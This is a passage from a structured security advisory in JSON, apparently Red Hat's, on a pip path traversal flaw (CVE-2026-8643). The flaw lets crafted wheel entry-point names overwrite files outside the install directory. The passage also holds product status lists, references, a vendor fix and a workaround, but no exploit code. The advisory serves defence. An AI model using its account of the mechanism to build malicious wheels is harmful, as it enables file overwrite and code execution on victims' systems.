"category": "description",
"text": "A flaw was found in pip, the package installer for Python. A remote attacker can exploit this vulnerability by tricking a victim into installing a malicious Python wheel. This wheel contains specially crafted entry-point names that use directory traversal or absolute paths. This allows pip to write generated script wrappers outside the intended installation directory, leading to arbitrary file overwrite. This can severely impact system integrity and availability, and in certain scenarios, may lead to arbitrary code execution.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pip: Path traversal via malicious entry point name in pip wheel installation allows arbitrary file overwrite",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in pip\u0027s wheel installation process allows for arbitrary file overwrite due to path traversal. An attacker could exploit this by convincing a user to install a specially crafted malicious Python wheel. While file overwrites are limited to the installing user\u0027s permissions, using `pip install` with elevated privileges in Red Hat environments significantly increases the potential impact, potentially leading to system integrity compromise or arbitrary code execution.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-8643"
},
{
"category": "external",
"summary": "RHBZ#2460927",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460927"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-8643",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-8643"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-8643",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8643"
},
{
"category": "external",
"summary": "https://github.com/pypa/pip/commit/8eb178480bd1a2b223f509fc430796b265158dfb",
"url": "https://github.com/pypa/pip/commit/8eb178480bd1a2b223f509fc430796b265158dfb"
}
],
"release_date": "2026-05-27T17:03:36.585000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "To mitigate this issue, users should avoid installing Python wheels from untrusted sources. It is strongly advised against using `pip install` with elevated privileges, such as `sudo`, when installing wheels. Additionally, administrators should inspect `entry_points.txt` within wheels for path separators or absolute paths before installation.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
